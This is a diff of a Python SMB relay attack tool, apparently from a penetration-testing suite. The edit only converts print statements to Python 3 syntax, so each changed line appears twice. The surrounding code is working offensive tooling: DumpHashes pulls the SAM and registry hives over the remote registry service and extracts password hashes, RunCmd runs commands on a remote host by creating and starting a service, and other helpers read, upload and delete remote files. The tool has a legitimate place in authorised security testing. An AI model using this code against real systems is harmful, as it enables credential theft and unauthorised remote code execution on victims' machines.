## DCE/RPC SVCCTLControlService, stop operation. ## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00")
@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLDeleteService. ## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n" print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108] #ContextHandlerService = data[88:108]
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108] #ContextHandlerService = data[88:108]
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n" print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\x2d\x22": if data[8:10] == "\x2d\x22":
print "[+] Can't open the file, access is denied (write protected file?)." print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
##OpenAndX. ##OpenAndX.
if data[8:10] == "\x2d\x34": if data[8:10] == "\x2d\x34":
print "[+] The command failed or took to long to complete." print ("[+] The command failed or took to long to complete.")
return data, s return data, s
##all good. ##all good.
@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\xa2\x22": if data[8:10] == "\xa2\x22":
print "[+] Can't open the file, access is denied (write protected file?)." print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
if data[8:10] == "\xa2\x35": if data[8:10] == "\xa2\x35":
print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename)
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
##OpenAndX. ##OpenAndX.
if data[8:10] == "\xa2\x34": if data[8:10] == "\xa2\x34":
print "[+] The command failed or took to long to complete." print ("[+] The command failed or took to long to complete.")
return data, s return data, s
##all good. ##all good.
@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s):
##Do large reads.. ##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520: if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation.. #Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520. #if we're here it's because filesize > 65520.
first = filesize-65520 first = filesize-65520
@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Downloaded in: %.3g minutes.'%(minutes) print ('Downloaded in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds) print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
count = 0 count = 0
bar = 80 bar = 80
start_time = time.time() start_time = time.time()
print 'File size: %s'%(GetReadableSize(FileSize)) print ('File size: %s'%(GetReadableSize(FileSize)))
for i in xrange(count_number): for i in xrange(count_number):
count = count+1 count = count+1
Chunk = FileContent[dataoffset:dataoffset+30000] Chunk = FileContent[dataoffset:dataoffset+30000]
@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Uploaded in: %.3g minutes.'%(minutes) print ('Uploaded in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Uploaded in: %.3g seconds'%(Seconds) print ('Uploaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2f\x00": if data[8:10] == "\x2f\x00":
@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s):
##Do large reads.. ##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520: if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation.. #Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520. #if we're here it's because filesize > 65520.
first = filesize-65520 first = filesize-65520
@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Downloaded in: %.3g minutes.\n'%(minutes) print ('Downloaded in: %.3g minutes.\n'%(minutes))
if Seconds<60: if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds) print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host):
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\x06\x21": if data[8:10] == "\x06\x21":
print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process." print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.")
print "[+] Try taskkill /F /IM process_name, then delete the file." print ("[+] Try taskkill /F /IM process_name, then delete the file.")
return data, s return data, s
if data[8:10] == "\x06\x34": if data[8:10] == "\x06\x34":
print "[+] Delete Failed. File not found." print ("[+] Delete Failed. File not found.")
return data, s return data, s
if data[8:10] == "\x06\x00": if data[8:10] == "\x06\x00":
@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC Query Info. ## DCE/RPC Query Info.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to read the key\n" print ("[+] Failed to read the key\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC CloseKey. ## DCE/RPC CloseKey.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to close the key\n" print ("[+] Failed to close the key\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler)
@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData):
Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
for i in range(len(JDSkew1GBGData)): for i in range(len(JDSkew1GBGData)):
Key += JDSkew1GBGData[Xored[i]] Key += JDSkew1GBGData[Xored[i]]
print 'BootKey: %s' % Key.encode("hex") print ('BootKey: %s' % Key.encode("hex"))
return Key return Key
##########Dump Hashes############# ##########Dump Hashes#############
@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..." print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3) time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "Retrying..." print ("Retrying...")
time.sleep(5) time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host):
##Error handling. ##Error handling.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##Grab the keys ##Grab the keys
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host):
Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp") Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp")
WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt") WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")
except: except:
print "[+] Live dump failed, is python-crypto installed? " print ("[+] Live dump failed, is python-crypto installed? ")
pass pass
print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt" print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")
return data return data
except: except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Save An HKLM Key And Its Subkeys############# ##########Save An HKLM Key And Its Subkeys#############
@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..." print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3) time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "Retrying..." print ("Retrying...")
time.sleep(5) time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key):
##Error handling. ##Error handling.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
data,s,handler,f = OpenHKLM(data,s,f) data,s,handler,f = OpenHKLM(data,s,f)
data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
if data[8:10] != "\x25\x00": if data[8:10] != "\x25\x00":
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
data,s = CloseFID(f, data, s) data,s = CloseFID(f, data, s)
data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key):
#After everything has been cleaned up, we write the output to a file. #After everything has been cleaned up, we write the output to a file.
WriteOutputToFile(Output, Host+"-"+Key+".tmp") WriteOutputToFile(Output, Host+"-"+Key+".tmp")
print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp" print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp")
return data return data
except: except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########ReadAFile############# ##########ReadAFile#############
@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host):
File = File.replace("/","\\") File = File.replace("/","\\")
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s) data,s,Output = GrabAndRead(f, File, data, s)
print Output print (Output)
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Read failed. Remote filename was typed correctly?" print ("[+] Read failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
def GetAfFile(data, s, File, Host): def GetAfFile(data, s, File, Host):
@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host):
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s) data,s,Output = GrabAndRead(f, File, data, s)
WriteOutputToFile(Output, Host+"-"+File) WriteOutputToFile(Output, Host+"-"+File)
print "[+] Done." print ("[+] Done.")
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Get file failed. Remote filename was typed correctly?" print ("[+] Get file failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########UploadAFile############# ##########UploadAFile#############
@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host):
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Write failed." print ("[+] Write failed.")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########DeleteAFile############ ##########DeleteAFile############
@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host):
data,s = CloseTID(data, s) data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Delete operation failed.\n[+] Something went wrong." print ("[+] Delete operation failed.\n[+] Something went wrong.")
data,s = CloseTID(data, s) data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
time.sleep(1) time.sleep(1)
data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:') Logs.info('Command executed:')
@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Runas############# ##########Runas#############
@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
time.sleep(1) time.sleep(1)
data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
